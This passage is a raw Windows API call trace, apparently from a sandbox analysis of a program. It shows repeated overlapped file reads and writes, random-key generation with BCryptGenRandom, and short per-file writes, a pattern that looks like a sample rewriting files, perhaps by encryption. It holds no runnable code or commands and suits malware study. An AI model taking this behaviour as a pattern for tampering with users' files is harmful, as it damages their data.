lpOverlapped=0x1ff1e60) returned 0x0 [0166.514] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.525] ReadFile (in: hFile=0x3cc, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x8da8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0166.535] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0166.545] ReadFile (in: hFile=0x170, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x26b0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0166.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.403] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x1420, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.404] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.416] CloseHandle (hObject=0x170) returned 1 [0167.416] free (_Block=0x3f70048) [0167.416] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.428] ReadFile (in: hFile=0x2a8, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1fc4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.429] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.443] CloseHandle (hObject=0x308) returned 1 [0167.443] free (_Block=0x1ff1e60) [0167.443] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.454] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x824e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0167.458] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.511] WriteFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0x6f30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.511] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.523] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.523] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.523] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0167.524] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.524] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.524] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0167.524] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.524] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.524] free (_Block=0x3e305b8) [0167.524] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.524] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.525] free (_Block=0x1fa91d0) [0167.525] free (_Block=0x1fa2ed8) [0167.525] free (_Block=0x1fa90b8) [0167.525] WriteFile (in: hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0167.525] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.537] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0167.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0167.538] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.539] free (_Block=0x3e305b8) [0167.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.539] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.539] free (_Block=0x1fa91d0) [0167.539] free (_Block=0x1fa2ed8) [0167.539] free (_Block=0x1fa90b8) [0167.539] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.539] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.548] CloseHandle (hObject=0x2a4) returned 1 [0167.548] free (_Block=0x3d70450) [0167.548] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.556] ReadFile (in: hFile=0x170, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x4090, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.571] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.573] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.573] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0167.573] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.574] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.574] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0167.574] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.574] free (_Block=0x3e305b8) [0167.574] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.574] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0167.575] free (_Block=0x1fa91d0) [0167.575] free (_Block=0x77d7a8) [0167.575] free (_Block=0x1fa90b8) [0167.575] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0167.575] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.576] ReadFile (in: hFile=0x308, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x76e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0167.578] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.835] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1670, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.835] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.846] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x41a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.847] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.861] WriteFile (in: hFile=0x2a4, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x39a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0167.861] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.875] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c, nNumberOfBytesToWrite=0xed0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 0x0 [0167.875] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.889] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x9fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0167.889] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.901] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x78a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0167.901] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.913] ReadFile (in: hFile=0x2a4, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x1020, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0167.921] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.921] CloseHandle (hObject=0x2a4) returned 1 [0167.922] free (_Block=0x3d70450) [0167.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.922] WriteFile (in: hFile=0x3cc, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0167.922] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.935] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0167.936] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0167.936] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0167.936] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0167.936] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0167.936] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0167.937] free (_Block=0x3e305b8) [0167.937] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0167.937] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0167.937] free (_Block=0x1fa91d0) [0167.937] free (_Block=0x1fa2ed8) [0167.937] free (_Block=0x1fa90b8) [0167.937] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0167.937] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.941] WriteFile (in: hFile=0x2a8, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1680, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0167.941] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.950] CloseHandle (hObject=0x3cc) returned 1 [0167.950] free (_Block=0x3df0008) [0167.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.961] ReadFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x634, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0167.961] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0167.972] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x7fce, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0167.983] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.006] ReadFile (in: hFile=0x2a8, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x4048, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 1 [0168.017] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.023] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.024] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0168.030] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.031] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.031] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0168.031] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.031] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.031] free (_Block=0x3e305b8) [0168.031] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.031] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.032] free (_Block=0x1fa91d0) [0168.032] free (_Block=0x1fa2ed8) [0168.032] free (_Block=0x1fa90b8) [0168.032] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0168.032] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.036] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x8630, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0168.037] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.045] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0168.046] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.046] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.046] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0168.047] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.047] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.047] free (_Block=0x3e305b8) [0168.047] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.047] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.047] free (_Block=0x1fa91d0) [0168.047] free (_Block=0x1fa2ed8) [0168.047] free (_Block=0x1fa90b8) [0168.047] WriteFile (in: hFile=0x2a4, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0168.047] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0168.057] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.057] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0168.057] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0168.058] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0168.058] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0168.058] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0168.058] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0168.059] free (_Block=0x3e305b8) [0168.059] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0168.059] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0168.059] free (_Block=0x1fa91d0) [0168.059] free (_Block=0x1fa2ed8) [0168.059] free (_Block=0x1fa90b8) [0168.059] WriteFile (in: hFile=0x2a8, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0168.062] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: 